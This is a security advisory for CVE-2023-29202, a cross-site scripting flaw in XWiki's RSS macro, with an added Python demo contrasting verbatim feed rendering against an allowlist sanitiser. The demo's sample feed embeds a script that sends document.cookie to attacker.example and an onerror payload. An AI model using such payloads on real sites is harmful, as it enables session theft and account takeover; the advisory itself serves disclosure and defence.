PT-2023-22199 · Xwiki · Xwiki

Michael Hamann

·

Published

2023-04-12

·

Updated

2023-04-25

·

CVE-2023-29202

CVSS v3.1

9.0

Critical

Vector: AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions: XWiki versions prior to 14.6 RC1
Description: The RSS macro in XWiki included the content of feed items in the HTML output without proper cleaning when the content parameter was set to true. This allowed arbitrary HTML and JavaScript injection, and thus cross-site scripting (XSS), by pointing the macro at an RSS feed containing malicious content. Because the injected script runs in the browser of whoever views the page, it could be used to execute arbitrary actions in the wiki, including privilege escalation, remote code execution, information disclosure, modifying or deleting content, and sabotaging the wiki, if a user with programming rights interacts with the affected page.
Recommendations: For versions prior to 14.6 RC1, update to XWiki 14.6 RC1, where the content of the feed is properly cleaned before being displayed. As a workaround, if the RSS macro isn't used in the wiki, consider uninstalling the macro by deleting WEB-INF/lib/xwiki-platform-rendering-macro-rss-XX.jar, where XX is XWiki's version, in the web application's directory.
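The following is an added example, not XWiki's own code, that reproduces the pattern described above in miniature: a feed item's HTML is concatenated into page output as-is (the vulnerable behaviour), next to an allowlist-based cleaner that removes script elements, event-handler attributes and non-http(s) URLs before the item is rendered (the class of fix the advisory describes). The feed, its payload and the tag/attribute allowlist are constructed for the demonstration and are assumptions; XWiki's real macro and cleaner differ in detail.

```python
# Added example (not XWiki code): why trusting feed HTML is XSS, and how an
# allowlist cleaner neutralises it. The feed below is constructed for the demo.
import html
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

# Constructed attacker-controlled feed: one item whose description carries a
# script element and an event-handler attribute, like a malicious feed would.
MALICIOUS_FEED = """<?xml version="1.0"?>
<rss version="2.0"><channel><title>Attacker feed</title>
<item>
  <title>Hello</title>
  <description><![CDATA[<p>Legit text</p><script>fetch('https://attacker.example/?c='+document.cookie)</script><img src=x onerror="alert(1)">]]></description>
</item>
</channel></rss>"""


def feed_items(xml_text):
    """Return (title, description) pairs for every <item> in an RSS 2.0 feed."""
    root = ET.fromstring(xml_text)
    return [(i.findtext("title", ""), i.findtext("description", ""))
            for i in root.iter("item")]


def render_unsafe(xml_text):
    """Vulnerable pattern: the item's HTML goes into the page verbatim."""
    return "".join(f"<h3>{html.escape(t)}</h3>{d}" for t, d in feed_items(xml_text))


class AllowlistCleaner(HTMLParser):
    """Re-serialise a fragment keeping only allowlisted tags and attributes."""
    ALLOWED = {"p": set(), "a": {"href"}, "b": set(), "i": set(), "em": set(),
               "strong": set(), "ul": set(), "ol": set(), "li": set(),
               "br": set(), "img": {"src", "alt"}}
    DROP_CONTENT = {"script", "style"}   # element and its text are discarded
    SAFE_SCHEMES = ("http://", "https://")
    VOID = {"br", "img"}

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in self.DROP_CONTENT:
            self.skip += 1
            return
        if tag not in self.ALLOWED:
            return  # unknown tag dropped; its text is still escaped via handle_data
        kept = []
        for name, value in attrs:
            if name not in self.ALLOWED[tag] or value is None:
                continue  # drops on*, style, and anything not allowlisted
            if name in ("href", "src") and not value.lower().startswith(self.SAFE_SCHEMES):
                continue  # blocks javascript:, data:, and relative probes
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in self.DROP_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif tag in self.ALLOWED and tag not in self.VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data))


def clean_html(fragment):
    cleaner = AllowlistCleaner()
    cleaner.feed(fragment)
    cleaner.close()
    return "".join(cleaner.out)


def render_safe(xml_text):
    """Fixed pattern: every item's HTML is cleaned before it reaches the page."""
    return "".join(f"<h3>{html.escape(t)}</h3>{clean_html(d)}"
                   for t, d in feed_items(xml_text))


if __name__ == "__main__":
    print("UNSAFE:", render_unsafe(MALICIOUS_FEED))
    print("SAFE:  ", render_safe(MALICIOUS_FEED))
```

The unsafe renderer emits the `<script>` element and the `onerror` handler untouched, so they execute in the browser of any viewer of the page, which is what makes a user with programming rights the high-value target. The cleaner is an allowlist, not a blocklist: anything not explicitly permitted is dropped, which is the property a feed sanitiser needs because the attacker controls the entire feed body.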

Exploit

Fix

RCE

XSS


Weakness Enumeration

Related Identifiers

CVE-2023-29202
GHSA-C885-89FW-55QR

Affected Products

Xwiki